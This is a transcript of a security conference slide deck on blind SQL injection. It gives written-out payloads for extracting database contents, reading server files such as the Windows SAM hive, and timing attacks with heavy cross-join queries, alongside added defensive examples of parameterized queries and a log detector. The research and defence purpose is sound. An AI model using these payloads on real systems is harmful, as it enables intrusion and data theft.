Re Playing with Blind SQL Injection - PowerPoint PPT Presentation

About This Presentation
Title:

Re Playing with Blind SQL Injection

Slides: 55
Provided by: shmo
Transcript and Presenter's Notes

1
(Re) Playing with (Blind) SQL Injection
  • José Palazón Palako
  • Mobile Security at Yahoo!
  • Chema Alonso
  • Informatica64
  • Microsoft MVP Enterprise Security

2
Spain (not only bulls)
3
SQL Injection attacks
A long time ago, in a galaxy far, far away
http://www.phrack.org/issues.html?issue=54&id=8
4
Agenda
  • Serialized SQL Injection
  • Demo: XML Extractor
  • Arithmetic SQL Injection
  • Divide by Zero
  • Sums and subtractions
  • Type overflow
  • Demo
  • Remote File Downloading using Blind SQL Injection
  • SQL Server
  • MySQL
  • Oracle
  • Demo: RFD Tool
  • Time-Based Blind SQL Injection using heavy
    queries
  • Demo: Marathon Tool

5
Serialized SQL Injection
6
Serialized SQL Injection
  • Goal: to merge complex result sets into a single
    displayable field
  • XML serialization functions allow a result set to
    be converted into a single XML string.
  • It is possible to download large amounts of data
    with single and simple injections.

7
SQL Server
  • FOR XML: retrieves data as a single string
    representing an XML tree.
  • RAW: mandatory option. Shows the information by
    converting each row of the result set into an XML
    element of the form <row />.
  • BINARY BASE64: the query will fail if any column of
    BINARY data type (containing images, or passwords)
    is present and this option is not explicitly
    specified.
  • union select '1','2','3',(select * from sysusers
    for xml raw, binary base64)
  • XMLSCHEMA obtains the whole table structure,
    including the data types, column names and other
    constraints.
  • Described by Dani Kachakil

8
MySQL
  • No default XML support; requires a server-side
    extension
  • GROUP_CONCAT (v 4.1)

9
Oracle
  • xmlforest, xmlelement,
  • No support

10
Demo Serialized SQL Injection
11
Arithmetic Blind SQL Injection
12
Blind Attacks
  • Attacker injects code but can't access the data
    directly.
  • However, this injection changes the behavior of
    the web application.
  • Then the attacker looks for differences between
    true code injections (1=1) and false code
    injections (1=2) in the response pages to extract
    data.
  • Blind SQL Injection
  • Blind XPath Injection
  • Blind LDAP Injection

13
Blind SQL Injection Attacks
  • Attacker injects
  • True where clauses
  • False where clauses
  • Ex:
  • Program.php?id=1 and 1=1
  • Program.php?id=1 and 1=2
  • Program doesn't return any visible data from the
    database or data in error messages.
  • The attacker can't see any data extracted from
    the database.

14
Blind SQL Injection Attacks
  • Attacker analyzes the response pages looking for
    differences between True-Answer Page and
    False-Answer Page
  • Different hashes
  • Different html structure
  • Different patterns (keywords)
  • Different linear ASCII sums
  • Different behavior
  • For example: response time

15
Blind SQL Injection Attacks
  • If any difference exists, then
  • Attacker can extract all information from the
    database
  • How? Using booleanization
  • MySQL
  • Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
  • True-Answer Page or False-Answer Page?
  • MSSQL
  • Program.php?id=1 and 100>(Select top 1
    ASCII(Substring(name,1,1)) from sysusers)
  • Oracle
  • Program.php?id=1 and 100>(Select
    ASCII(Substr(username,1,1)) from all_users where
    rownum<=1)

16
Arithmetic Blind SQL Injection
  • The query forces the parameter to be numeric
  • SELECT field FROM table WHERE id=abs(param)
  • Boolean logic is created with math operations
  • Divide by zero
  • Sums and subtractions
  • Type overflows

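An added defender-side example (not code from the talk or its authors) for slides 13 to 16: the `abs(param)` query with the request parameter pasted into the SQL text still yields the 1=1 / 1=2 page difference the slides use as an oracle, while the hardened form (type validation plus a bound parameter) gives the same page for both probes. The `programs` table, `sqlite3` backend and function names are constructed for the example.

```python
import sqlite3

# Constructed in-memory stand-in for the backend behind the slides' Program.php?id=...
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE programs (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO programs VALUES (?, ?)", [(1, "alpha"), (2, "beta")])


def vulnerable_lookup(id_param: str) -> list:
    """Slide 16's query with the request parameter pasted into the SQL text.
    abs() constrains the value of the expression, not what the expression is,
    so '1 and 1=2' or '1+65-65' are simply evaluated as SQL."""
    sql = "SELECT name FROM programs WHERE id=abs(%s)" % id_param
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(id_param: str) -> list:
    """Hardened form: validate the type in the application, then bind the value."""
    id_value = int(id_param)  # raises ValueError for anything that is not an integer
    rows = conn.execute("SELECT name FROM programs WHERE id=abs(?)", (id_value,))
    return [row[0] for row in rows]


def response_for(lookup, probe: str):
    """What the requester observes: the result rows, or a rejection (error page)."""
    try:
        return lookup(probe)
    except (ValueError, sqlite3.Error):
        return "rejected"


def pages_differ(lookup, true_probe: str, false_probe: str) -> bool:
    """The blind oracle from slides 13-15: do a 'true' and a 'false' injection
    produce different pages?  With a fixed query they must not."""
    return response_for(lookup, true_probe) != response_for(lookup, false_probe)


if __name__ == "__main__":
    print("vulnerable:", pages_differ(vulnerable_lookup, "1 and 1=1", "1 and 1=2"))  # True
    print("hardened:  ", pages_differ(safe_lookup, "1 and 1=1", "1 and 1=2"))        # False
```

The same check shows why `abs()` is not a defence: the arithmetic probes of slides 17 and 18 (`1+65-65` versus `1+65-64`) also produce two different pages from `vulnerable_lookup`.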
17
Arithmetic Blind SQL Injection
  • Divide by zero (David Litchfield)
  • Id=A+(1/(ASCII(B)-C))
  • A -> Param value originally used in the query.
  • B -> Value we are searching for, e.g.
    Substring(passwd,1,1)
  • C -> Counter 0..255
  • When ASCII(B)=C, the DB will generate a divide by
    zero exception.

18
Arithmetic Blind SQL Injection
  • Sums and subtractions
  • Id=A+ASCII(B)-C
  • A -> Param value originally used in the query.
  • B -> Value we are searching for, e.g.
    Substring(passwd,1,1)
  • C -> Counter 0..255
  • When ASCII(B)=C, then the response page of
    id=A+ASCII(B)-C will be the same as id=A

19
Arithmetic Blind SQL Injection
  • Value type overflow
  • Id=A+((C/ASCII(B))*(K))
  • A -> Param value originally used in the query.
  • B -> Value we are searching for, e.g.
    Substring(passwd,1,1)
  • C -> Counter 0..255
  • K -> Value that overflows the type defined for A
  • (e.g. if A is integer, then K=2^32)
  • When C/ASCII(B)=1, K*1 overflows the data type

20
Demo
  • Divide by zero
  • Sums and subtractions
  • Integer overflow

21
Remote File Downloading using Blind SQL Injection techniques
22
Accessing Files
  • Two ways
  • Load the file in a temp table
  • and i>(select top 1 ASCII(Substring(column,pos,1))
    from temp_table) ??
  • Load the file in the query
  • With every query the file is loaded in memory
  • I am very sorry, engine ?
  • and i>ASCII(Substring(load_file(file),pos,1)) ??

23
SQL Server 2K - External Data Sources
  • Only for known filetypes
  • Access through drivers: txt, csv, xls, mdb, log
  • And 200>ASCII(SUBSTRING((SELECT * FROM
    OPENROWSET('MSDASQL', 'Driver={Microsoft Text
    Driver (*.txt; *.csv)};DefaultDir=C:\','select
    top 1 * from c:\dir\target.txt')),1,1))
  • Privileges
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\
    Providers\DisallowAdhocAccess=0
  • By default this key doesn't exist, so only users
    with the Server Admin role can use these functions.
  • NTFS permissions

24
SQL Server 2K Bulk option
  • Access to any file
  • Create Table TempTable (row varchar(8000)) --
  • Bulk Insert TempTable From 'c:\file.ext' With
    (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n') --
  • alter table TempTable add num int
    IDENTITY(1,1) NOT NULL
  • and (select COUNT(row) from TempTable)
  • and (select top 1 len(row) from TempTable where
    num=rownum)
  • and (select top 1 ASCII(SUBSTRING(row,1,1)) from
    TempTable where num=1)
  • Drop Table TempTable --
  • Privileges needed
  • Server Role: Bulkadmin
  • Database Role: db_owner or db_ddladmin
  • NTFS permissions

25
SQL Server 2k5 / 2k8
  • OPENDATASOURCE and OPENROWSET supported
  • Bulk options improved
  • AND 256>ASCII(SUBSTRING((SELECT * FROM
    OPENROWSET(BULK 'c:\windows\repair\sam',
    SINGLE_BLOB) As Data), 1, 1))
  • Permissions
  • Bulkadmin Server Role
  • External Data Sources enabled
  • sp_configure
  • Surface Area Configuration tool for features

26
MySQL
  • LoadFile
  • SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
  • SQLbfTools: MySQLget command (illo and dab)
  • http://www.reversing.org/node/view/11
  • Load Data infile
  • Create table C8DFC643 (datos varchar(4000))
  • Load data infile 'c:\\boot.ini' into table
    C8DFC643
  • alter table C8DFC643 add column num integer
    auto_increment unique key
  • and (select count(num) from C8DFC643)
  • and (select length(datos) from C8DFC643 where
    num=1)
  • and (select ASCII(substring(datos,5,1)) from
    C8DFC643 where num=1)
  • Drop table C8DFC643

27
Oracle Plain Text files
  • External Tables
  • execute immediate 'Create Directory A4A9308C As
    ''c:\'' '; end; --
  • execute immediate 'Create table A737D141 (
    datos varchar2(4000) ) organization external
    (TYPE ORACLE_LOADER default directory A4A9308C
    access parameters ( records delimited by newline
    ) location (''boot.ini''))'; end; --
  • Only plain text files

28
Oracle DBMS_LOB
  • execute immediate '
  • DECLARE l_bfile BFILE;
  • l_blob BLOB;
  • BEGIN INSERT INTO A737D141 (datos) VALUES
    (EMPTY_BLOB()) RETURN datos INTO l_blob;
  • l_bfile := BFILENAME(''A4A9308C'',
    ''Picture.bmp'');
  • DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
  • DBMS_LOB.loadfromfile(l_blob, l_bfile,
    DBMS_LOB.getlength(l_bfile));
  • DBMS_LOB.fileclose(l_bfile);
  • COMMIT;
  • EXCEPTION
  • WHEN OTHERS THEN ROLLBACK;
  • END;'
  • end; --

29
Demo: RFD
30
Time-based Blind SQL Injection using heavy queries
31
Time-Based Blind SQL Injection
  • In scenarios with no differences between the
    True-Answer Page and the False-Answer Page, time
    delays can be used.
  • Injection forces a delay in the response page
    when the condition injected is True.
  • Delay functions
  • SQL Server: waitfor
  • Oracle: dbms_lock.sleep
  • MySQL: sleep or Benchmark function
  • Postgres: pg_sleep
  • Ex:
  • if (exists(select * from users)) waitfor delay
    '0:0:5'

32
Exploit for Solar Empire Web Game
33
Deep Blind SQL Injection
  • Time delay depends on the wanted value.
  • E.g. a -> 10 s. delay, b -> 11 s. delay, ...
  • http://labs.portcullis.co.uk/application/deep-blind-sql-injection/

34
Time-Based Blind SQL Injection
  • What about database engines without delay
    functions, i.e., MS Access, Oracle connections
    without PL/SQL support, DB2, etc.?
  • Can we still exploit them with Time-Based Blind
    SQL Injection attacks?

35
Yes, we can!
36
Where-Clause execution order
  • Select whatever
  • From whatever
  • Where condition1 and condition2
  • - Condition1 lasts 10 seconds
  • - Condition2 lasts 100 seconds
  • Which condition should be executed first?

37
The heavy condition first
38
The light condition first
39
Time-Based Blind SQL Injection using Heavy Queries
  • Attacker can perform an exploitation delaying the
    True-answer page using a heavy query.
  • It depends on how the database engine evaluates
    the where clauses in the query.
  • There are two types of database engines
  • Databases without optimization process
  • Databases with optimization process

40
Time-Based Blind SQL Injection using Heavy Queries
  • Attacker could inject a heavy Cross-Join
    condition to delay the response page in
    True-Injections.
  • The Cross-Join injection must be heavier than the
    other condition.
  • Attacker only has to know or to guess the name
    of a table with select permission in the
    database.
  • Example in MSSQL
  • Program.php?id=1 and (SELECT count(*) FROM
    sysusers AS sys1, sysusers AS sys2, sysusers AS
    sys3, sysusers AS sys4, sysusers AS sys5,
    sysusers AS sys6, sysusers AS sys7, sysusers AS
    sys8)>1 and 300>(select top 1 ascii(substring(name
    ,1,1)) from sysusers)

41
Default tables to construct a heavy query
  • Microsoft SQL Server
  • sysusers
  • Oracle
  • all_users
  • MySQL (version 5)
  • information_schema.columns
  • Microsoft Access
  • MSysAccessObjects (97 / 2000 versions)
  • MSysAccessStorage (2003 / 2007)

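An added detection example (not code from the talk, the Marathon Tool or the authors) covering the serialized, file-downloading, time-delay and heavy-query injections shown in the preceding slides: it scans request lines for the delay functions (slide 31), the repeated self cross-join on a default table (slides 40 and 41), the OPENROWSET / LOAD_FILE / external-table file reads (slides 23 to 28) and the FOR XML / GROUP_CONCAT serialization (slides 7 and 8). The label names, regexes and sample log lines are constructed here; the lines are assumed to be URL-encoded as a web server logs them.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Signatures for the techniques shown in the deck; the labels are chosen here
# and are not the tools' or the authors' terminology.
SIGNATURES = {
    "boolean_probe": r"\bascii\s*\(\s*substr|\band\s+1\s*=\s*[12]\b",
    "time_delay": r"\bwaitfor\s+delay\b|\b(?:sleep|benchmark|pg_sleep)\s*\(|dbms_lock\.sleep",
    "file_read": r"\b(?:openrowset|opendatasource|load_file)\s*\(|\bload\s+data\s+infile\b"
                 r"|\bbulk\s+insert\b|dbms_lob\.|\borganization\s+external\b",
    "xml_serialize": r"\bfor\s+xml\b|\bgroup_concat\s*\(|\bxml(?:forest|element)\s*\(",
}

def _heavy_cross_join(sql: str, min_repeats: int = 3) -> bool:
    """True when one FROM list names the same table min_repeats or more times
    (the slide's 'sysusers AS sys1, sysusers AS sys2, ...' self cross-join)."""
    for m in re.finditer(r"\bfrom\b([^)]*)", sql, re.I):
        names = [p.split()[0].lower() for p in m.group(1).split(",") if p.split()]
        if names and max(Counter(names).values()) >= min_repeats:
            return True
    return False

def classify(log_line: str) -> list:
    """Sorted technique labels matched by one request line (URL-decoded first)."""
    sql = unquote(log_line)
    hits = [name for name, pat in SIGNATURES.items() if re.search(pat, sql, re.I)]
    if _heavy_cross_join(sql):
        hits.append("heavy_cross_join")
    return sorted(hits)

def scan(lines):
    """(line number, labels) for every line that matched at least one signature."""
    return [(i, tags) for i, line in enumerate(lines, 1) if (tags := classify(line))]

# Constructed sample requests, written as the server would see them after decoding.
SAMPLE_LOG = [
    "GET /Program.php?id=1 HTTP/1.1",
    "GET /Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) HTTP/1.1",
    "GET /Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2,"
    " sysusers as sys3, sysusers AS sys4)>1 and 300>(select top 1 ascii(substring(name,1,1))"
    " from sysusers) HTTP/1.1",
    "GET /Program.php?id=1; if (exists(select * from users)) waitfor delay '0:0:5' HTTP/1.1",
    "GET /Program.php?id=1 and 256>ASCII(SUBSTRING((SELECT * FROM OPENROWSET(BULK"
    " 'c:\\windows\\repair\\sam', SINGLE_BLOB) As Data),1,1)) HTTP/1.1",
]

if __name__ == "__main__":
    for lineno, tags in scan(SAMPLE_LOG):
        print(lineno, ", ".join(tags))
```

Only the first request passes clean; a heavy-query attempt against a guessed table such as Clients or Users (next slide) is still caught because the self-join check counts repeated table names rather than matching a fixed list.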
42
Default tables to construct a heavy query
  • or whatever you can guess
  • Clients
  • Customers
  • News
  • Logins
  • Users
  • Providers
  • ...Use your imagination

43
Ex 1 MS SQL Server
  • Query lasts 14 seconds -> True-Answer

44
Ex 1 MS SQL Server
  • Query lasts 1 second -> False-Answer

45
Ex 2 Oracle
  • Query lasts 22 seconds -> True-Answer

46
Ex 2 Oracle
  • Query lasts 1 second -> False-Answer

47
Ex 3 Access 2000
  • Query lasts 6 seconds -> True-Answer

48
Ex 3 Access 2000
  • Query lasts 1 second -> False-Answer

49
Ex 4 Access 2007
  • Query lasts 39 seconds -> True-Answer

50
Ex 4 Access 2007
  • Query lasts 1 second -> False-Answer

51
Marathon Tool
  • Automates Time-Based Blind SQL Injection Attacks
    using Heavy Queries in SQL Server, MySQL, MS
    Access and Oracle Databases.
  • Schema Extraction from known databases
  • Extracts data using heavy queries no matter which
    database engine (without schema)
  • Developed in .NET
  • Source code available

52
Demo: Marathon Tool
53
Prevention: Don't forget Bobby Tables! SANITIZE YOUR QUERIES!
54
Questions?
  • Speakers
  • Chema Alonso (chema_at_informatica64.com)
  • Palako (palako_at_lateatral.com)
  • Authors
  • Chema Alonso (chema_at_informatica64.com)
  • Alejandro Martín (amartin_at_informatica64.com)
  • Antonio Guzmán (aguzman_at_urjc.es)
  • Daniel Kachakil (dani_at_kachakil.org)
  • José Palazón Palako (palako_at_lateatral.com)
  • Marta Beltran (mberltran_at_urjc.es)